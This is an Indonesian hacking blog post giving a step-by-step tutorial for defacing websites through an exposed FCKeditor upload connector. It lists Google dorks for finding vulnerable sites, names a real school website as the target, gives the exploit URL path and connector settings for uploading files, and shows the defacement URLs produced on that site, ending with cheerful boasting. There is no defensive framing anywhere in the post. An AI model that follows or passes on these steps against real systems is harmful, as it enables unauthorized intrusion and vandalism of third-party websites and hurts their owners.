| Filename | Deface dengan Teknik FCKeditor |
| Permission | rw-r--r-- |
| Author | 4n4M N0tF0unD |
| Date and Time | 05.17 |
| Label | Hacking |
| Action |
Deface website dengan teknik FckEditor ini adalah teknik yang paling mudah dalam mendeface sebuah website, oke karena tidak ada yang mau dibahas panjang lebar kita langsung aja ke TKP
- Persiapan :
- file Deface, yang bisa kita upload nantinya hanya file yang ber ekstensi .txt / .jpg / .gif /.png selain itu tidak bisa
- Dork FCKeditor :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
inurl:/editor/editor/filemanager/inurl:/html/guru.php?
inurl:/HTMLEditor/editor/"
inurl:/HTMLEditor/editor//filemanager/
inurl:/HTMLEditor/editor/filemanager/connectors/
- Cari target dengan Memasukkan Dork di atas, setelah target terlihat kita pilih salah satu
- lalu buka Website target, disini saya memilih http://www.sman1kotabaru.sch.id/html/alumni.php?id=data sebagai target
- Setelah itu kita tambahkan Exploit pada Url target :
/editor/filemanager/connectors/test.html
Sehingga menjadi http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/test.html lalu Enter
- maka akan muncul halaman seperti ini
- lalu pada Connector kita ganti dari ASP menjadi PHP , juga pada Resource Type kita ganti menjadi File
- selanjutnya kita pilih Choose File , lalu pilih file yang ingin di Upload, terus kita klik Upload
- Jika Berhasil aka muncul pesan seperti berikut
- lalu kita tinggal buka hasil Deface kita dengan cara menambahkan /userfiles/file/namfilekamu.txt pada Url website target
http://www.sman1kotabaru.sch.id/userfiles/file/4n4m.txt
Contoh dengan file Image / gambar
http://www.sman1kotabaru.sch.id/userfiles/file/anam-sbh.jpg
Horeeee...... kita berhasil Deface website .....
Mudah kan ???
Sekian dari saya semoga membantu dan bermanfaat, Terima Kasih dan sampai Jumpa